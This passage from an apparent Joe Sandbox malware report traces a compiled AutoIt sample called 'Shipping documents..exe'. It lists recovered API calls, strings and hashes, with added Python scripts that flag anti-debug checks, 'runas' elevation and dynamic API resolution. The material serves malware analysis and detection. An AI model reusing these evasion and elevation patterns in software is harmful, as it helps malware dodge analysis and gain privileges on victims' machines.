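    for m in _TOKEN.finditer(text):
        if m.group("src"):
            edges[int(m.group("src"))].add(int(m.group("dst")))
            continue
        rest = m.group("rest") or ""
        calls = sum(int(n) for n in _CALLS.findall(rest))
        # Drop the "N API calls" phrases and any stray numbers; what is left
        # are the routine names the plugin printed on this node.
        apis = [t for t in _CALLS.sub(" ", rest).split() if not t.isdigit()]
        nodes[int(m.group("id"))] = {
            "addr": int(m.group("addr"), 16), "apis": apis, "calls": calls}
    return nodes, dict(edges)


def reachable_apis(nodes, edges, start):
    """Depth-first walk over the edges; return the set of routine names on
    every node reachable from `start` (the start node included)."""
    seen, todo, apis = {start}, [start], set()
    while todo:
        n = todo.pop()
        apis.update(nodes.get(n, {}).get("apis", []))
        for m in edges.get(n, ()):
            if m not in seen:
                seen.add(m)
                todo.append(m)
    return apis


def api_nodes_by_address(nodes):
    """(address, [names]) for nodes that name at least one routine, in address
    order, i.e. the order a reverser meets them in the disassembly."""
    return sorted((v["addr"], v["apis"]) for v in nodes.values() if v["apis"])


if __name__ == "__main__":
    nodes, edges = parse_graph(SAMPLE)
    for addr, names in api_nodes_by_address(nodes):
        print(f"{addr:08x}  {' '.join(names)}")
    print("reachable from 88209:", sorted(reachable_apis(nodes, edges, 88209)))
```

Run stand-alone it prints the API-bearing nodes of the excerpt in address order and then the routines reachable from node 88209 (CloseHandle, CreateFileW, GetPEB, ReadFile, VirtualAlloc, VirtualFree). That open/allocate/read/free sequence, sitting in a region outside the mapped image, is the spot a reverser would want to pull out of a graph this size first; the parser makes that selection a one-line query instead of a visual search.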
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 004096C1
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • _memmove.LIBCMT ref: 0040970C
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                          • _memmove.LIBCMT ref: 00409D96
                                                                                                          • _memmove.LIBCMT ref: 0040A6C4
                                                                                                          • _memmove.LIBCMT ref: 004297E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2383988440-0
                                                                                                          • Opcode ID: cab14365d0cfeeb30ca1dc9ea4b8da49c1ba6ce4e0cb3449a27a12e19585523b
                                                                                                          • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                          • Opcode Fuzzy Hash: cab14365d0cfeeb30ca1dc9ea4b8da49c1ba6ce4e0cb3449a27a12e19585523b
                                                                                                          • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                                                          APIs
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                            • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents..exe,00000104,?), ref: 00401F4C
                                                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                            • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                          • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Shipping documents..exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                            • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                          • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                            • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                            • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                            • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                            • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                            • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                          • String ID: C:\Users\user\Desktop\Shipping documents..exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                          • API String ID: 2495805114-884126049
                                                                                                          • Opcode ID: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                                                          • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                          • Opcode Fuzzy Hash: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                                                          • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                                                          [Control-flow graph of 0040E500, recovered from the graph data: the entry block calls 0040BC70, GetVersionExW, 00402160, 0040E660 and 0040E680; the main path reaches 0040E5BA (call 0040EF60), then 0040E5CD GetCurrentProcess and 0040EF20, 0040E612 (call 0040EFD0) and 0040E629 (call 0040EF90, GetNativeSystemInfo); the fallback blocks 004276C6 and 004276D5 call GetSystemInfo instead; FreeLibrary is called at 0040E641 and 0040E653 before the function returns at 0040E656]
                                                                                                          APIs
                                                                                                          • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                          • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                          • String ID: 0SH$#v
                                                                                                          • API String ID: 3363477735-2448020801
                                                                                                          • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                          • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                          • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                          • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: IsThemeActive$uxtheme.dll
                                                                                                          • API String ID: 2574300362-3542929980
                                                                                                          • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                          • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                          • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                          • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
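The two records above are the lines an analyst pulls out of a Joe Sandbox function listing to map the report's signatures back to addresses: the startup routine (0040D5AA through 0042E2B9) lists IsDebuggerPresent, the MessageBoxA banner of the AutoIt3 interpreter stub and ShellExecuteW next to the string "runas", which is what the "Checks if the current process is being debugged" and "Contains functionality to execute programs as a different user" signatures point at; the uxtheme.dll / IsThemeActive pair resolved through LoadLibraryA and GetProcAddress is what "Contains functionality to dynamically determine API calls" points at. The Python below is an added example and is not part of the report or of Joe Sandbox. It parses the "APIs" and "String ID" lines of this listing format into per-function records and flags those three patterns; the sample input is constructed from lines copied from the two records, and the regular expression, the flag names and the anti-debug watch-list are assumptions of the example. One caveat a practitioner should keep in mind: all three patterns sit in the AutoIt3 runtime (the MessageBoxA banner identifies it), so they appear in any compiled AutoIt script and are weak indicators on their own; the injection and credential-theft signatures in the report's Detection section are the discriminating ones.

```python
"""Triage a Joe Sandbox function listing: parse 'APIs' / 'String ID' lines into
per-function records and flag anti-debug checks, LoadLibrary+GetProcAddress
resolution and ShellExecute with the 'runas' verb. Added example; the regex and
the flag rules are assumptions, not Joe Sandbox's own format definition."""
import re

# One API call line, with or without an argument list, optionally attributed
# to a subcall, e.g.
#   • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
#   • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,...), ref: 00401F4C
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[\w@:]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# Joe Sandbox joins a record's strings with '$' on the 'String ID' line.
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*?)\s*$")

ANTI_DEBUG_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent"}  # assumed watch-list
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
SHELL_EXEC = {"ShellExecuteA", "ShellExecuteW", "ShellExecuteExA", "ShellExecuteExW"}

# Constructed sample: lines copied from the two function records discussed above.
SAMPLE = r"""
APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents..exe,00000104,?), ref: 00401F4C
• IsDebuggerPresent.KERNEL32 ref: 0040D5B6
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
• GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
• ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
Similarity
• String ID: C:\Users\user\Desktop\Shipping documents..exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
APIs
• LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
Similarity
• String ID: IsThemeActive$uxtheme.dll
"""


def parse_records(text):
    """Start a new record at every 'APIs' header; attach the calls and strings under it."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = {"apis": [], "strings": []}
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            current["apis"].append({
                "api": m.group("api"),
                "module": m.group("mod"),
                "args": m.group("args") or "",
                "ref": m.group("ref"),
                "subcall_of": m.group("subfn"),  # None for the function's own calls
            })
            continue
        m = STRING_LINE.match(line)
        if m and m.group("ids"):
            current["strings"].extend(s for s in m.group("ids").split("$") if s)
    return records


def flag_record(rec):
    """Apply the three (assumed) rules to one record and return human-readable flags."""
    flags = []
    names = {a["api"] for a in rec["apis"]}
    for api in sorted(names & ANTI_DEBUG_APIS):
        flags.append("anti-debug: %s" % api)
    # 'runas' may show up as a record string or as a recovered stack argument.
    has_runas = "runas" in rec["strings"] or any(
        "runas" in a["args"].split(",") for a in rec["apis"])
    if names & SHELL_EXEC and has_runas:
        flags.append("elevation: ShellExecute with 'runas' verb")
    loads = [a for a in rec["apis"] if a["api"] in LOADERS]
    procs = [a for a in rec["apis"] if a["api"] == "GetProcAddress"]
    if loads and procs:
        modules = [a["args"].split(",")[0] for a in loads if a["args"]]
        symbols = [a["args"].split(",")[1] for a in procs if a["args"].count(",") >= 1]
        flags.append("dynamic API resolution: %s -> %s"
                     % (", ".join(modules) or "?", ", ".join(symbols) or "?"))
    return flags


def triage(text):
    """Return (address of first call, flags) for every record that trips a rule."""
    hits = []
    for rec in parse_records(text):
        flags = flag_record(rec)
        if flags:
            first_ref = rec["apis"][0]["ref"] if rec["apis"] else "?"
            hits.append((first_ref, flags))
    return hits


if __name__ == "__main__":
    for ref, flags in triage(SAMPLE):
        print(ref, "; ".join(flags))
```

Feed it the text of a whole report and each hit comes back keyed by the address of the record's first call, which is enough to jump to the function in the memory dump the report lists under "Memory Dump Source". Because the rules key on the same API names the report's signatures do, a hit in the AutoIt runtime routines above should be read as "expected for a compiled AutoIt script" rather than as evidence by itself.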
                                                                                                          APIs
                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeInfoLibraryParametersSystem
                                                                                                          • String ID: #v
                                                                                                          • API String ID: 3403648963-554117064
                                                                                                          • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                          • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                          • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                          • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                          APIs
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                          • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                          • TranslateMessage.USER32(?), ref: 00409556
                                                                                                          • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                          • API String ID: 1762048999-758534266
                                                                                                          • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                                                          • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                          • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                                                          • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents..exe,00000104,?), ref: 00401F4C
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • __wcsicoll.LIBCMT ref: 00402007
                                                                                                          • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                          • __wcsicoll.LIBCMT ref: 00402033
                                                                                                            • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                          • __wcsicoll.LIBCMT ref: 00402049
                                                                                                          • _wcscpy.LIBCMT ref: 0040207C
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents..exe,00000104), ref: 00428B5B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Shipping documents..exe$CMDLINE$CMDLINERAW
                                                                                                          • API String ID: 3948761352-2233779990
                                                                                                          • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                                                          • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                          • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                                                          • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                          • String ID: D)E$D)E$FILE
                                                                                                          • API String ID: 3888824918-361185794
                                                                                                          • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                          • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                          • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                          • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                          • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                          • _wcsncat.LIBCMT ref: 0040E433
                                                                                                          • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                            • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          • _wcscpy.LIBCMT ref: 0040E487
                                                                                                            • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                          • _wcscat.LIBCMT ref: 00427541
                                                                                                          • _wcslen.LIBCMT ref: 00427551
                                                                                                          • _wcslen.LIBCMT ref: 00427562
                                                                                                          • _wcscat.LIBCMT ref: 0042757C
                                                                                                          • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
